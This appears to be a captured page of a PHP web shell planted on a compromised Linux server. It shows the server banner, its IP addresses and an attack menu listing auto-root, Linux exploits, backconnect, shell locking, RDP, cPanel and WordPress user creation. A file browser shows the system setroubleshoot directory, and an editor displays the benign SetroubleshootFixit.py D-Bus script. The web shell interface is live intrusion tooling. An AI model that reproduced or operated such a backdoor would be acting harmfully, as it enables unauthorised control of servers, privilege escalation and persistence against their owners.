Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
setroubleshoot /
[ HOME SHELL ]
Name
Size
Permission
Action
gui
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
SetroubleshootFixit.py
1.04
KB
-rwxr-xr-x
SetroubleshootFixit.pyc
1.75
KB
-rw-r--r--
SetroubleshootFixit.pyo
1.75
KB
-rw-r--r--
updater.py
1.13
KB
-rwxr-xr-x
updater.pyc
1.22
KB
-rw-r--r--
updater.pyo
1.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SetroubleshootFixit.py
#!/usr/bin/python import dbus import dbus.service import dbus.mainloop.glib import gobject import slip.dbus.service from slip.dbus import polkit import os class RunFix(slip.dbus.service.Object): default_polkit_auth_required = "org.fedoraproject.setroubleshootfixit.write" def __init__ (self, *p, **k): super(RunFix, self).__init__(*p, **k) @dbus.service.method ("org.fedoraproject.SetroubleshootFixit", in_signature='ss', out_signature='s') def run_fix(self, local_id, analysis_id): import subprocess command = ["sealert", "-f", local_id, "-P", analysis_id] return subprocess.check_output(command, universal_newlines=True) if __name__ == "__main__": mainloop = gobject.MainLoop () dbus.mainloop.glib.DBusGMainLoop (set_as_default=True) system_bus = dbus.SystemBus () name = dbus.service.BusName("org.fedoraproject.SetroubleshootFixit", system_bus) object = RunFix(system_bus, "/org/fedoraproject/SetroubleshootFixit/object") slip.dbus.service.set_mainloop (mainloop) mainloop.run ()
Close